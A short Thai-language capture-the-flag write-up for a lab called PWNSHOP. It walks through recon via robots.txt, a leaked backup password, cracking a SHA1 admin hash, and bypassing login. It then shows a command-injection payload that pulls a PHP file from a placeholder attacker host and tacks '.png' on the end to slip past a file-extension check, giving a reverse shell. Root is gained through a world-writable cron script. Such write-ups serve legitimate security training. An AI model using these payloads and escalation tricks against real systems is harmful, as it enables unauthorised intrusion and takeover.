Writeup แบบรีบๆ
แลป : PWNSHOP
file : pwnshop.zip
hack to hack:
1. สแกน path เจอ /robots.txt
2. ไปหน้า products.html เจอไฟล์ sussy ชื่อ alertinfo.js เปิดได้ password ของ backups db
3. เจอ โฟลเดอร์ ฐาานข้อมูล และ โฟลเดอร์ admin ที่ robots.txt
4. ไปโหลดไฟล์ db มา และ unzip ด้วย รหัสผ่านจากข้อ 2
5. SHA1 CRACK ได้รหัสผ่าน admin ไปที่หน้า admin และ login
6. จะสังเกตว่า เว็บมันม่ีบัคอยู่ ลบ parameter action ออก
7. เข้าสู่ระบบได้ละ เว็บมันสามารถ โหลดไฟล์จากเน็ต แต่ นามสกุล เป็น png,jpg,gif เท่านั้น ก็อ่าน source หน้านี้ จากไฟล์ home.php.txt มีใบ้ใน หน้านี้แล้ว แต่เข้ารหัส base64
8. อ่านเสร็จ จะพบ ช่องโหว่ blind os command injection ใช้ payload นี้
http://<hacker_ip>:<port>/<file>.php && echo "ooo" > wow.txt.png เพราะมัน check ตัวสุดท้ายของ inputว่า เป็น .png,.jpg,.gif หรือป่าว จึง เขียน เป็นแบบนี้เพื่อ bypass 
จะสังเกตว่า สามารถโหลดไฟล์ php เพื่อ reverse shell ได้ละ

ยกระดับสิทธิ์
- มีไฟล์ ลับ /tmp/.secret.sh permission = 777 
เนื้อหา
#!/bin/bash
echo 'PWN SHOP !!!' > /tmp/pwnshop.txt
รันด้วย crontab ของ user ไหนก็ได้ crontab -u username -e
ได้ shell user
ส่วน --> root ก็แล้วแต่พี่เลยครับ

